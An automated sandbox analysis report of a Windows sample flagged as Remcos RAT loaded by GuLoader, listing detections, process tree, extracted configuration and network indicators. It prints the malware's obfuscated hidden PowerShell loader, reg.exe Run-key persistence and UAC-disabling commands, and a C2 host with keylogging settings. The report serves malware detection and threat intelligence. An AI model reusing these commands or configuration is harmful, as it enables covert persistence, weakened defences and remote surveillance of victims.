Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
anziOUzZJs.exe

Overview

General Information

Sample name:anziOUzZJs.exe
renamed because original name is a hash value
Original sample name:39f1703e13bdc112f4ffe9240f70cd5eb5b07cc218e6b22a8d58e4dcfaadd0a1.exe
Analysis ID:1502984
MD5:61bdbe7854f1572202f7916cf7f03616
SHA1:e03a3385bc0cd5869c2a8cc72c80f4115b7b7945
SHA256:39f1703e13bdc112f4ffe9240f70cd5eb5b07cc218e6b22a8d58e4dcfaadd0a1
Tags:exeGuLoader
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Disables UAC (registry)
Drops PE files with a suspicious file extension
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Powershell drops PE file
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Uses cmd line tools excessively to alter registry or file data
Uses dynamic DNS services
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • anziOUzZJs.exe (PID: 7248 cmdline: "C:\Users\user\Desktop\anziOUzZJs.exe" MD5: 61BDBE7854F1572202F7916CF7F03616)
    • powershell.exe (PID: 7800 cmdline: "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7812 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 7264 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • cmd.exe (PID: 1056 cmdline: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 4308 cmdline: C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • WerFault.exe (PID: 5192 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7800 -s 3448 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 6108 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7800 -s 2384 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 2176 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "PP9.duckdns.org:3256:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-7CSH4D", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.2009656049.0000000008137000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    0000000A.00000002.2007087274.00000000070D0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000A.00000002.2002199771.0000000002B58000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        Process Memory Space: powershell.exe PID: 7800JoeSecurity_RemcosYara detected Remcos RATJoe Security

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Suspicious Script Execution From Temp Folder
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)", CommandLine: "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\anziOUzZJs.exe", ParentImage: C:\Users\user\Desktop\anziOUzZJs.exe, ParentProcessId: 7248, ParentProcessName: anziOUzZJs.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)", ProcessId: 7800, ProcessName: powershell.exe
          Sigma detected: CurrentVersion Autorun Keys Modification
          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7264, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Preferentialist
          Sigma detected: Direct Autorun Keys Modification
          Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7812, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)", ProcessId: 7264, ProcessName: reg.exe
          Sigma detected: Potential Binary Or Script Dropper Via PowerShell
          Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7800, TargetFilename: C:\Users\user\AppData\Local\Temp\Partivarerne.scr
          Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7800, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)", ProcessId: 7812, ProcessName: cmd.exe
          Sigma detected: SCR File Write Event
          Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7800, TargetFilename: C:\Users\user\AppData\Local\Temp\Partivarerne.scr
          Sigma detected: Suspicious Screensaver Binary File Creation
          Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7800, TargetFilename: C:\Users\user\AppData\Local\Temp\Partivarerne.scr
          Sigma detected: Use Short Name Path in Command Line
          Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)", CommandLine: "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\anziOUzZJs.exe", ParentImage: C:\Users\user\Desktop\anziOUzZJs.exe, ParentProcessId: 7248, ParentProcessName: anziOUzZJs.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)", ProcessId: 7800, ProcessName: powershell.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)", CommandLine: "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\anziOUzZJs.exe", ParentImage: C:\Users\user\Desktop\anziOUzZJs.exe, ParentProcessId: 7248, ParentProcessName: anziOUzZJs.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)", ProcessId: 7800, ProcessName: powershell.exe
          Sigma detected: Windows Processes Suspicious Parent Directory
          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2176, ProcessName: svchost.exe

          Stealing of Sensitive Information

          barindex
          Sigma detected: Remcos
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7800, TargetFilename: C:\ProgramData\remcos\logs.dat

          Suricata Signatures

          Timestamp:2024-09-02T16:20:41.195073+0200
          SID:2803270
          Severity:2
          Source Port:49726
          Destination Port:443
          Protocol:TCP
          Classtype:Potentially Bad Traffic

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 0000000A.00000002.2007087274.00000000070D0000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "PP9.duckdns.org:3256:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-7CSH4D", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\Partivarerne.scrReversingLabs: Detection: 52%
          Multi AV Scanner detection for submitted file
          Source: anziOUzZJs.exeReversingLabs: Detection: 52%
          Yara detected Remcos RAT
          Source: Yara matchFile source: 0000000A.00000002.2009656049.0000000008137000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2007087274.00000000070D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2002199771.0000000002B58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7800, type: MEMORYSTR
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 81.8% probability
          Source: anziOUzZJs.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.7:49726 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.7:49729 version: TLS 1.2
          Source: anziOUzZJs.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: System.Configuration.Install.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Data.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.DirectoryServices.pdbTzQs source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: tion.pdb source: powershell.exe, 0000000A.00000002.2009656049.000000000816C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.Security.pdbH source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Management.pdbc source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Xml.ni.pdbRSDS# source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Core.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.ServiceProcess.pdb` source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Numerics.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: mscorlib.pdb4X(w source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Transactions.ni.pdbRSDSc source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.DirectoryServices.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.ServiceProcess.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: mscorlib.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Configuration.Install.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.Security.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Xml.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.ni.pdbRSDS source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.DirectoryServices.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Configuration.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: stem.Core.pdb source: powershell.exe, 0000000A.00000002.2009656049.00000000080D0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Microsoft.PowerShell.Commands.Management.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Xml.pdbMZ@ source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: mscorlib.ni.pdbRSDS source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb4' source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Configuration.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Data.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Xml.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbu source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Management.Automation.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Windows.Forms.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Management.Automation.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: mscorlib.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Management.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Management.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Data.ni.pdbRSDS source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Core.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Transactions.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Configuration.Install.pdbh source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.Commands.Management.pdb.> source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Transactions.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: em.Core.pdbM source: powershell.exe, 0000000A.00000002.2009656049.00000000080D0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Numerics.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Data.pdb, source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Core.ni.pdbRSDS source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: C:\Users\user\Desktop\anziOUzZJs.exeCode function: 0_2_00405FFD FindFirstFileA,FindClose,0_2_00405FFD
          Source: C:\Users\user\Desktop\anziOUzZJs.exeCode function: 0_2_0040559B GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040559B
          Source: C:\Users\user\Desktop\anziOUzZJs.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
          Source: C:\Users\user\Desktop\anziOUzZJs.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer ShortcutsJump to behavior

          Networking

          barindex
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: PP9.duckdns.org
          Uses dynamic DNS services
          Source: unknownDNS query: name: a458386d9.duckdns.org
